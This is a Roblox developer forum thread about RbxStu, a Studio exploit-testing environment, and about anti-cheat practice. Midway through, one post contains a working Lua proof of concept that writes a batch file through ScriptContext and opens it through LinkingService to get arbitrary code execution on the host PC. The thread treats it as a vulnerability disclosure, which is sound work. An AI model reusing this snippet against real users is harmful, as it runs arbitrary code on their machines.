Ultimately I don’t think we can encourage or endorse the use of external tooling like RbxStu, but I can say we have absolutely no plans as of this post to police Studio with anticheat. So, as of now it’s possible to use tools like these without concern of the usage of these being moderated/detected.

Obviously outside of Studio this is a different story, and also this should not be taken as blanket permission to use tools like these since this breaks our ToS. All I can say is there’s no anticheat in Studio and no plans to add it there as of now.

Whilist I created RbxStu for the purposes of pentesting your own games, it is meant really to execute untrusted exploiter code. As such I didn’t want to risk some things, this is why things like the UNC IO library are NOT in, and might never be in, as such I wanted to avoid as much as possible implementing vulnerable things, but it is just really impossible, as an exploit environment like so has primitives like game:HttpGet and hookfunction that allow you to break out of sandbox easily and break a games’ entire integrity. Whilist i tried to secure some of the functions you may have available at high contexts it is still risky to run RbxStu until I do either of two things:

1 - Close source

Make RbxStu closed source how it was originally going to be, this completely stops from knowledgable exploiters from looking through the code and exploiting vulnerabilities that despite might have been clear to them, were not for me, however, this is unfeasable for many reasons.

2 - Open source, but complete rewrite

Continue RbxStu as an open source project, but rewrite it from scratch, something like a V2, with better structure overall, and perhaps completely automatic updating, as Roblox Studio does not have any agressive protections like shuffling structs.

Whilist the RbxStu was never made to cause damage to Roblox as a platform at any point and I haven’t heard of it much more than from some friends using it to patch scripts or antitamper/cheat development for their games, all of this without using any third party tools that might compromise their system as I provide the source and DLL for you to inject into your studio if you want to do anything, I try as much as possible to make it easy to find what the script may be using to do anything to the game (including exploit functions). Thanks to RbxStu me and @shadowmaster940 are working on another project, that for now goes unspecified, but that it would virtually be some kind of generic anti-tamper, and that would be open source, but i digress.

It is completely understandable that roblox does not endorse the tool, it goes directly towards their ToS, and they would not want to make an exploiter-like tool neither, becuase when implementing libraries such as io and others, if those are vulnerable, its not as simple as “It is a third party” it would be Roblox the one allowing it, not you going out of your way to get external tooling.

(And yes RbxStu may eventually get a rewrite to be much more stable, but until then its just too sporadic on what stability refers to, so if you DO choose to use it, bear in mind your studio will crash most likely, and even then you will have to roll back to an older version, as I haven’t had the time to update the offsets to the latest studio version).

I appreciate you replying here. I also think this situation perfectly captures the issue developers face that is part of what I’m trying to highlight generally to the community and perhaps contribute to pushing for change in some way.

Roblox treats all users equally and I have a lot of respect for that approach, I don’t think it should change, it’s one of the core premises the platform was built on and thrives on.

However, it also results in this awful situation developers find themselves in. I, the same as the vast majority of developers, have never written a single line of code with malicious intent in my life. We dedicate our lives to creating these games while we work on them. Exploits can destroy that work. I don’t blame the people who wrote them or Roblox for their existence, I simply want to fix them and prevent them. The people who create them have very little to lose, their livelihoods don’t depend on a single Roblox account, they won’t lose years of work if they’re banned. We will.

I can’t download one of these script executors, I doubt I would be treated any differently by the systems and moderators if detected using one in my own game. What are we supposed to do? Use an old laptop with a VPN and a new account, hoping it doesn’t disconnect and we are grouped in with the people we are trying to fight against? I wouldn’t risk it.

@roalex2008 here is trying to do something good. They should be appreciated for that, but instead they have to constantly worry that what they are working on might go against the ToS. I don’t mean this against any Roblox staff in this thread but against the way things are in general. We don’t feel safe combatting this in the only ways that are really possible and it’s not the exploiters that we are most scared of, it’s Roblox itself.

And I should say that I’m not at all trying to say that all exploits require this, in most cases securing a game from a known or unknown exploit can be done with enough knowledge but it’s just not always the case. I doubt Roblox would be anywhere near as effective at site and engine security if it wasn’t for your ability to reverse engineer known exploits in a privileged sandboxed environment.

Understood.

Another suggestion I would make generally is a program of trusted developers where we can submit exploits we are struggling with to Roblox, perhaps only in extreme/ specific cases based on criteria. If Roblox must keep such an environment private then a developer program like this could centralise efforts against common obfuscation techniques, and provide those staff with continuous insight into the latest methods being used, and give a place for developers and the security team to work together and directly benefit developers at the same time.

The big issue isn’t with fixing an exploit once we know what it’s doing, it’s that these days they are so heavily obfuscated there’s little option but to reverse engineer them to try and figure out what they’re even doing.

I mean, I used to be an exploiter, the fun wears off in games to simply, its not worth it to exploit at all. The only times I “Exploit” now is with auto clickers, and that is on really abusive games with the player, filled with dark patterns that make them unplayable.

Roblox is not particularly looming against me I’d say, I have said many times I have no problem with taking down RbxStu if any Roblox staff is concerned about it having some reprecussion, I’m open to taking it down, archiving/deleting the repo and keeping it for private use only.

Still, some people say “Validation fixes everything!”, it really does do wonders, but people undermine the power a client has in games like Obby’s, for example, where kill bricks can be completely deactivated with some little mangling.

I truly do NOT recommend you use any executor, at ALL. I know some of the owners, they’re good and sometimes fairly goofy, the Solara owner does it for literal learning, which I find amusing, but the problem is, you should not benefit the cheating industry, and if you do, you will end up getting banned eventually, as EVERYTHING that is currently released is detected, and Hyperion will not make any “Ah you’re doing it with good intent” kind of deal, they will whack you straight up, and that is great tbf.

RbxStu is practically a learning project, I took various actual client exploits, and just started experimenting with how they implemented custom functions and other deals, the way of getting the state IS unstable, and that really cannot change unless I rewrite it, which i don’t really know when i will.

As a rule of thumb for exploit protection: Don’t trust the client, treat your remote inputs as the devil, if you are willing to sacrifice developer experience for security, turn to using something like ByteNet or Zap, they’re net libs that essentially make all your networking go through buffers, and makes exploiting much tougher when your data goes through remotes becuase you simply cannot peek in to see what happens, normally this will fend off most people who just don’t care enough or aren’t determined enough, if you’re worried about your environment being hooked, you can try running some important parts of the game inside of Actor | Documentation - Roblox Creator Hub, which despite not being an anticheat tool per say, makes a whole new Lua VM where the scripts run, making so hooking is basically impossible unless they have a function called run_on_actor, which allows them to execute code in them, most fancy games, like Phantom Forces use actors on their anti-cheat stack for reasons like that.

You can also improve the game by adding Delayed bans, why you may ask? Delayed bans makes it so if you detect something, it doesn’t scream at the player “I detected you, cheater” it rather sends them as “i bypassed this, fool developer”, but in reality, it is just a honeypot, and when they release the detected feature, all the ones who cheated, are now detected, flagged and will, eventually, get banned.

As much as we want to do something about obfuscation, it will never really be “solved”, what you can do is make detections for their UIs, most exploiters use the same UI library like rayfield. This allows you to just detect that UI lib, and make them unable to do anything about it, anti-cheat things are mostly @shadowmaster940’s stuff, I’m mostly just playing around and learning myself on the go, which as a side effect resulted on the little experiment i wrote with shadow, which is like a weird general purpose anti-tamper, it can be found on my github as “zoop”, but its too experimental, and straight up has little to no detections in place to do much to really recommend it, as deobfuscation was really something out of the window, I simply wrote RbxStu, and wrote some cheap and simple “Environment Instrumentation” as i call it, which just shows me what calls the exploit environment makes and you can get one or two things from the script that way, while trying to replicate exploit behaviour to let it continue, I sadly can not ever see RbxStu in action, as I have never done a game by myself that has gotten other exploiters’ attention.

These library names are incredible

I mean, this all sounds great. I will likely check it out, and thanks for the warnings regarding the stability of it. Do you recommend any particular safeguards in place to prevent any kind of lasting damage in the worst case from one of these scripts should they be written maliciously against reverse engineering itself? Is running in a baseplate enough, or do I need to be more careful than that

I’d probably say running it on a game copy, as in, a local place copy could solve some of the issues relating to security, but then it may act weirdly, the problem is I’m yet to see a script that directly attacks RbxStu, so for now I’m at a miss if it is happening sadly. That aside.

There are some checks to protect against malicious malicious scripters, as I’d call them. There are metamethod hooks set on the DataModel to prevent indexing services and functions deemed dangerous, if there are bypasses for them, I have not been aware of them, however when I first had the chance to check the security of RbxStu regarding env stuff, I checked with a script made by someone and it passed all it’s tests, so you have that as a “Passes Vulnerability Check!” trademark I suppose, but it’s not enough, when performing HttpGet it will block discord webhooks, so you’re not logged for example, in the future I’d like that feature to extend to a list of blocked URLs or something along those lines

The code below achieves arbitrary code execution in RLua environments with a thread identity higher than 2! Run batch files, powershell files, anything you can think of! In the PC of Roblox Exploiters!

(Works in RbxStu!)

ScriptContext = game:FindService('ScriptContext')
LinkingService = game:FindService('LinkingService')

Code = "@echo off\nstart https://www.roblox.com/users/4497609693/profile"
Name = "omg.bat"
Path = ScriptContext:SaveScriptProfilingData(Code, Name) -- creates an omg.bat file with the code inside it, then returns the path to the batch file

-- opens the bat file resulting in arbitrary code execution
print(LinkingService:OpenUrl(Path)) -- if returned true, successful code execution

alright? I don’t know what you expect me to tell you honestly, as I said before, I have to rewrite the entire thing either way, surely if you have enough time to find things like this, then you have enough time to do something that benefits it as a whole or make a better version of it, so be my guest.

Besides the point, LinkingService is relatively new, never heard of it, it was practically added a month ago, coincidentally, the last RbxStu commit was ALSO a month ago, shocker, I’m not going to constantly check the update list for services that can be exploited like this, and what you pointed out about on identities superior than 2 may not be true, because pretty sure Plugins run at higher contexts and they most likely aren’t affected by it, since Roblox 100% wouldn’t allow that behaviour to happen either way…

I’ll update RbxStu to hot fix the vulnerability tomorrow.

I was working on a project “Drainer Drainer 123” which is aimed to test almost all vulnerabilities possible in Roblox Executors such as the one made by the very incompetent developer rexi, called Wave. I read this thread at the time that I had that code copied, and I saw that you said “I’m yet to see a script that directly attacks RbxStu” so I thought why not quickly paste it, lol.

Oh and, I’m pretty sure Plugins run at PluginSecurity which is identity 1. I may be wrong though.

Last I checked PluginSecurity was more than LocalUser (Context wise) and identity wise I think they were level 5, either way Rexi is complete garbage, I once spoke to the guy, he kept insulting over my country of origin non stop lol.

As for the vulnerability checker, good you wrote one, because actual true exploits these days aren’t even held to scrutiny they used to originally have so in general they’re much more vulnerable, that being said RbxStu hasn’t updated in a month, and pretty much this service was added a month ago, coincidences are annoying, either way good work and thanks for informing about it, I already informed in my server about it, I’ll deploy a Hotfix for it later tomorrow

Plugin is indeed 5

The security of exploits fell off significantly since Synapse’s departure, all of the biggest nobodies in the community have but a clue on how to properly secure their exploits.

Wave is a great example of this, there are multiple unpatched RCE’s, multiple detection methods, no clue how they expect to remain undetected from Hyperion if they can’t even remain undetected from game developers.

Solara is obviously a little harder, they’re external so their custom environment is non-existent, though you can still do the good ol’ preloadasync attacks on the stupid drawing library they use.

Anyways.

If you’re a game developer and still have issues with these exploits, feel free to DM me for a detection or two

Wanted to come back to this again to say that, a Roblox-provided environment doesnt need to actually give access to sensitive services, rather what would work just as well is a simulated response, enough for such a tool to then build a profile of what an exploit is doing, i.e. what events it’s trying to fire, what remote addresses it’s trying to access, etc.

Feel free to send over any obfuscated scripts that you’re having trouble with.

It’s not really about detection anymore, the people still using the modern junk are well beyond the point where being ‘detected’ deters them. People still exploiting won’t care about detection unless their accounts get terminated. Why care when you can exploit for 7 months and only get slapped with a couple 1-day bans every now and then? The moderation is toothless.

As long as it can achieve injection/execution, people will pay for it.

I think the most bizarre part about the introduction of Hyperion is how infrequent the preventative measures it’s supposed to enact are. Why add an anti-tamper company to your portfolio if you’re going to remove folks who tamper with the game twice a year, and for a single day at a time at first blush, at that?

Just a head scratching decision that makes developing a competitive game experience on Roblox that much less desirable. Roblox’s bureaucracy when it comes to punishing cheaters has struggled to catch up for the past decade and a half, and the gap doesn’t seem to stop widening.

Between the lack of action on Hyperion detections and the seemingly half-baked Ban API (that can be bypassed simply by switching accounts, no VPN necessary!) - the response here has been lukewarm at best.

I’ve been on the platform since 2007 - and the lack of progress on this forefront has been disappointing.

Would be nice if as a developer you had the option to either directly be told when a player is detected in your game, and take your own action, or set a bar for how Roblox should be when banning players from your experience specifically, if Roblox doesn’t want to potentially give indicators about what Hyperion is up to, allow developers to essentially request that Roblox themselves ban players permanently from your game for e.g. if you have a high protection level.

correct me if im wrong but this is in regards to just detecting an exploit that took place but not having the tools to determine how the exploit worked?

you said that players are automatically completing certain game wide actions, what do you mean by this? are they teleporting their character? or abusing a remote event to trigger events? if you know what things in your game could allow the player to accomplish their goal surely you will know what they are doing right? I’m probably missing something.